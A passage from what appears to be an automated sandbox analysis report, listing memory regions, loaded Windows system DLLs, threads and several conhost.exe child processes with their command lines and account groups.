0x0 region_type = private name = "private_0x000000b418a90000" filename = "" Region: id = 3296 start_va = 0xb418aa0000 end_va = 0xb418aa0fff entry_point = 0x0 region_type = private name = "private_0x000000b418aa0000" filename = "" Region: id = 3297 start_va = 0xb418ab0000 end_va = 0xb418ab0fff entry_point = 0x0 region_type = private name = "private_0x000000b418ab0000" filename = "" Region: id = 3298 start_va = 0xb418db0000 end_va = 0xb418dbffff entry_point = 0x0 region_type = private name = "private_0x000000b418db0000" filename = "" Region: id = 3299 start_va = 0xb418dc0000 end_va = 0xb418f47fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b418dc0000" filename = "" Region: id = 3300 start_va = 0xb418f50000 end_va = 0xb4190d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b418f50000" filename = "" Region: id = 3301 start_va = 0xb4190e0000 end_va = 0xb41a4dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b4190e0000" filename = "" Region: id = 3302 start_va = 0x7ff6c47e0000 end_va = 0x7ff6c48dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c47e0000" filename = "" Region: id = 3303 start_va = 0x7ff6c490c000 end_va = 0x7ff6c490dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c490c000" filename = "" Region: id = 3304 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 3305 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 3306 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 3307 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 3308 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 3309 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 3310 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 3311 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 3312 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 3313 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 3314 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 3315 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 4208 start_va = 0xb418ac0000 end_va = 0xb418afffff entry_point = 0x0 region_type = private name = "private_0x000000b418ac0000" filename = "" Region: id = 4209 start_va = 0xb418b00000 end_va = 0xb418b0ffff entry_point = 0x0 region_type = private name = "private_0x000000b418b00000" filename = "" Region: id = 4210 start_va = 0xb418c30000 end_va = 0xb418d44fff entry_point = 0x0 region_type = private name = "private_0x000000b418c30000" filename = "" Region: id = 4211 start_va = 0xb418d60000 end_va = 0xb418d6ffff entry_point = 0x0 region_type = private name = "private_0x000000b418d60000" filename = "" Region: id = 4212 start_va = 0xb41a4e0000 end_va = 0xb41a816fff entry_point = 0xb41a4e0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 4213 start_va = 0xb41a820000 end_va = 0xb41aa37fff entry_point = 0x0 region_type = private name = "private_0x000000b41a820000" filename = "" Region: id = 4214 start_va = 0xb41aa40000 end_va = 0xb41ac56fff entry_point = 0x0 region_type = private name = "private_0x000000b41aa40000" filename = "" Region: id = 4215 start_va = 0xb41ac60000 end_va = 0xb41ae76fff entry_point = 0x0 region_type = private name = "private_0x000000b41ac60000" filename = "" Region: id = 4216 start_va = 0xb41ae80000 end_va = 0xb41af89fff entry_point = 0x0 region_type = private name = "private_0x000000b41ae80000" filename = "" Region: id = 4217 start_va = 0x7ff6c490a000 end_va = 0x7ff6c490bfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c490a000" filename = "" Region: id = 4218 start_va = 0x7ffbff170000 end_va = 0x7ffbff205fff entry_point = 0x7ffbff170000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 4219 start_va = 0x7ffc008a0000 end_va = 0x7ffc008e9fff entry_point = 0x7ffc008a0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 4220 start_va = 0x7ffc008f0000 end_va = 0x7ffc00902fff entry_point = 0x7ffc008f0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 4221 start_va = 0x7ffc00910000 end_va = 0x7ffc0091efff entry_point = 0x7ffc00910000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 4222 start_va = 0x7ffc00940000 end_va = 0x7ffc00f67fff entry_point = 0x7ffc00940000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 4223 start_va = 0x7ffc00fc0000 end_va = 0x7ffc01072fff entry_point = 0x7ffc00fc0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 4224 start_va = 0x7ffc01640000 end_va = 0x7ffc016e5fff entry_point = 0x7ffc01640000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 4225 start_va = 0x7ffc022c0000 end_va = 0x7ffc037e4fff entry_point = 0x7ffc022c0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 4226 start_va = 0x7ffc03a50000 end_va = 0x7ffc03aa0fff entry_point = 0x7ffc03a50000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Thread: id = 111 os_tid = 0xe64 Thread: id = 166 os_tid = 0xfe4 Thread: id = 235 os_tid = 0x10b0 Thread: id = 284 os_tid = 0x11a0 Process: id = "81" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x5d45b000" os_pid = "0xe68" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "38" os_parent_pid = "0xd04" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1844 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1845 start_va = 0xc147f0000 end_va = 0xc1480ffff entry_point = 0x0 region_type = private name = "private_0x0000000c147f0000" filename = "" Region: id = 1846 start_va = 0xc14810000 end_va = 0xc14823fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000c14810000" filename = "" Region: id = 1847 start_va = 0xc14830000 end_va = 0xc1486ffff entry_point = 0x0 region_type = private name = "private_0x0000000c14830000" filename = "" Region: id = 1848 start_va = 0x7df5ffbb0000 end_va = 0x7ff5ffbaffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffbb0000" filename = "" Region: id = 1849 start_va = 0x7ff6c4300000 end_va = 0x7ff6c4322fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4300000" filename = "" Region: id = 1850 start_va = 0x7ff6c432d000 end_va = 0x7ff6c432efff entry_point = 0x0 region_type = private name = "private_0x00007ff6c432d000" filename = "" Region: id = 1851 start_va = 0x7ff6c432f000 end_va = 0x7ff6c432ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c432f000" filename = "" Region: id = 1852 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 1853 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1854 start_va = 0xc14900000 end_va = 0xc149fffff entry_point = 0x0 region_type = private name = "private_0x0000000c14900000" filename = "" Region: id = 1855 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1856 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2401 start_va = 0xc147f0000 end_va = 0xc147fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000c147f0000" filename = "" Region: id = 2402 start_va = 0xc14800000 end_va = 0xc14806fff entry_point = 0x0 region_type = private name = "private_0x0000000c14800000" filename = "" Region: id = 2403 start_va = 0xc14870000 end_va = 0xc148affff entry_point = 0x0 region_type = private name = "private_0x0000000c14870000" filename = "" Region: id = 2404 start_va = 0xc148b0000 end_va = 0xc148b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000c148b0000" filename = "" Region: id = 2405 start_va = 0xc148c0000 end_va = 0xc148c6fff entry_point = 0x0 region_type = private name = "private_0x0000000c148c0000" filename = "" Region: id = 2406 start_va = 0xc148d0000 end_va = 0xc148d0fff entry_point = 0x0 region_type = private name = "private_0x0000000c148d0000" filename = "" Region: id = 2407 start_va = 0xc148e0000 end_va = 0xc148e0fff entry_point = 0x0 region_type = private name = "private_0x0000000c148e0000" filename = "" Region: id = 2408 start_va = 0xc14a00000 end_va = 0xc14abdfff entry_point = 0xc14a00000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2409 start_va = 0xc14b80000 end_va = 0xc14b8ffff entry_point = 0x0 region_type = private name = "private_0x0000000c14b80000" filename = "" Region: id = 2410 start_va = 0xc14b90000 end_va = 0xc14d17fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000c14b90000" filename = "" Region: id = 2411 start_va = 0xc14d20000 end_va = 0xc14ea0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000c14d20000" filename = "" Region: id = 2412 start_va = 0xc14eb0000 end_va = 0xc162affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000c14eb0000" filename = "" Region: id = 2413 start_va = 0x7ff6c4200000 end_va = 0x7ff6c42fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4200000" filename = "" Region: id = 2414 start_va = 0x7ff6c432b000 end_va = 0x7ff6c432cfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c432b000" filename = "" Region: id = 2415 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 2416 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 2417 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2418 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 2419 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2420 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2421 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2422 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2423 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2424 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2425 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2426 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Thread: id = 112 os_tid = 0xe6c Thread: id = 164 os_tid = 0xfdc Thread: id = 199 os_tid = 0x1008 Thread: id = 271 os_tid = 0x116c Process: id = "82" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0xf416000" os_pid = "0xe70" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "39" os_parent_pid = "0xd0c" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1857 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1858 start_va = 0x754420000 end_va = 0x75443ffff entry_point = 0x0 region_type = private name = "private_0x0000000754420000" filename = "" Region: id = 1859 start_va = 0x754440000 end_va = 0x754453fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000754440000" filename = "" Region: id = 1860 start_va = 0x754460000 end_va = 0x75449ffff entry_point = 0x0 region_type = private name = "private_0x0000000754460000" filename = "" Region: id = 1861 start_va = 0x7df5ff5d0000 end_va = 0x7ff5ff5cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff5d0000" filename = "" Region: id = 1862 start_va = 0x7ff6c4610000 end_va = 0x7ff6c4632fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4610000" filename = "" Region: id = 1863 start_va = 0x7ff6c4635000 end_va = 0x7ff6c4635fff entry_point = 0x0 region_type = private name = "private_0x00007ff6c4635000" filename = "" Region: id = 1864 start_va = 0x7ff6c463e000 end_va = 0x7ff6c463ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c463e000" filename = "" Region: id = 1865 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 1866 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1867 start_va = 0x754540000 end_va = 0x75463ffff entry_point = 0x0 region_type = private name = "private_0x0000000754540000" filename = "" Region: id = 1868 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1869 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3238 start_va = 0x754420000 end_va = 0x75442ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000754420000" filename = "" Region: id = 3239 start_va = 0x754430000 end_va = 0x754436fff entry_point = 0x0 region_type = private name = "private_0x0000000754430000" filename = "" Region: id = 3240 start_va = 0x7544a0000 end_va = 0x7544dffff entry_point = 0x0 region_type = private name = "private_0x00000007544a0000" filename = "" Region: id = 3241 start_va = 0x7544e0000 end_va = 0x7544e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000007544e0000" filename = "" Region: id = 3242 start_va = 0x7544f0000 end_va = 0x7544f6fff entry_point = 0x0 region_type = private name = "private_0x00000007544f0000" filename = "" Region: id = 3243 start_va = 0x754500000 end_va = 0x754500fff entry_point = 0x0 region_type = private name = "private_0x0000000754500000" filename = "" Region: id = 3244 start_va = 0x754510000 end_va = 0x754510fff entry_point = 0x0 region_type = private name = "private_0x0000000754510000" filename = "" Region: id = 3245 start_va = 0x754640000 end_va = 0x7546fdfff entry_point = 0x754640000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3246 start_va = 0x754700000 end_va = 0x754887fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000754700000" filename = "" Region: id = 3247 start_va = 0x754890000 end_va = 0x75489ffff entry_point = 0x0 region_type = private name = "private_0x0000000754890000" filename = "" Region: id = 3248 start_va = 0x7548a0000 end_va = 0x754a20fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000007548a0000" filename = "" Region: id = 3249 start_va = 0x754a30000 end_va = 0x755e2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000754a30000" filename = "" Region: id = 3250 start_va = 0x7ff6c4510000 end_va = 0x7ff6c460ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4510000" filename = "" Region: id = 3251 start_va = 0x7ff6c463c000 end_va = 0x7ff6c463dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c463c000" filename = "" Region: id = 3252 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 3253 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 3254 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 3255 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 3256 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 3257 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 3258 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 3259 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 3260 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 3261 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 3262 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 3263 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 4265 start_va = 0x755e30000 end_va = 0x755e6ffff entry_point = 0x0 region_type = private name = "private_0x0000000755e30000" filename = "" Region: id = 4266 start_va = 0x755e70000 end_va = 0x755f7ffff entry_point = 0x0 region_type = private name = "private_0x0000000755e70000" filename = "" Region: id = 4267 start_va = 0x755f80000 end_va = 0x755fbffff entry_point = 0x0 region_type = private name = "private_0x0000000755f80000" filename = "" Region: id = 4268 start_va = 0x755fd0000 end_va = 0x755fdffff entry_point = 0x0 region_type = private name = "private_0x0000000755fd0000" filename = "" Region: id = 4269 start_va = 0x755fe0000 end_va = 0x756316fff entry_point = 0x755fe0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 4270 start_va = 0x756320000 end_va = 0x756530fff entry_point = 0x0 region_type = private name = "private_0x0000000756320000" filename = "" Region: id = 4271 start_va = 0x756540000 end_va = 0x75675dfff entry_point = 0x0 region_type = private name = "private_0x0000000756540000" filename = "" Region: id = 4272 start_va = 0x756760000 end_va = 0x756976fff entry_point = 0x0 region_type = private name = "private_0x0000000756760000" filename = "" Region: id = 4273 start_va = 0x756980000 end_va = 0x756a93fff entry_point = 0x0 region_type = private name = "private_0x0000000756980000" filename = "" Region: id = 4274 start_va = 0x7ff6c463a000 end_va = 0x7ff6c463bfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c463a000" filename = "" Region: id = 4275 start_va = 0x7ffbff170000 end_va = 0x7ffbff205fff entry_point = 0x7ffbff170000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 4276 start_va = 0x7ffc008a0000 end_va = 0x7ffc008e9fff entry_point = 0x7ffc008a0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 4277 start_va = 0x7ffc008f0000 end_va = 0x7ffc00902fff entry_point = 0x7ffc008f0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 4278 start_va = 0x7ffc00910000 end_va = 0x7ffc0091efff entry_point = 0x7ffc00910000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 4279 start_va = 0x7ffc00940000 end_va = 0x7ffc00f67fff entry_point = 0x7ffc00940000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 4280 start_va = 0x7ffc00fc0000 end_va = 0x7ffc01072fff entry_point = 0x7ffc00fc0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 4281 start_va = 0x7ffc01640000 end_va = 0x7ffc016e5fff entry_point = 0x7ffc01640000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 4282 start_va = 0x7ffc022c0000 end_va = 0x7ffc037e4fff entry_point = 0x7ffc022c0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 4283 start_va = 0x7ffc03a50000 end_va = 0x7ffc03aa0fff entry_point = 0x7ffc03a50000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Thread: id = 113 os_tid = 0xe74 Thread: id = 163 os_tid = 0xfd8 Thread: id = 233 os_tid = 0x10a8 Thread: id = 287 os_tid = 0x11ac Process: id = "83" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0xf49a000" os_pid = "0xe78" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "40" os_parent_pid = "0xd14" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" 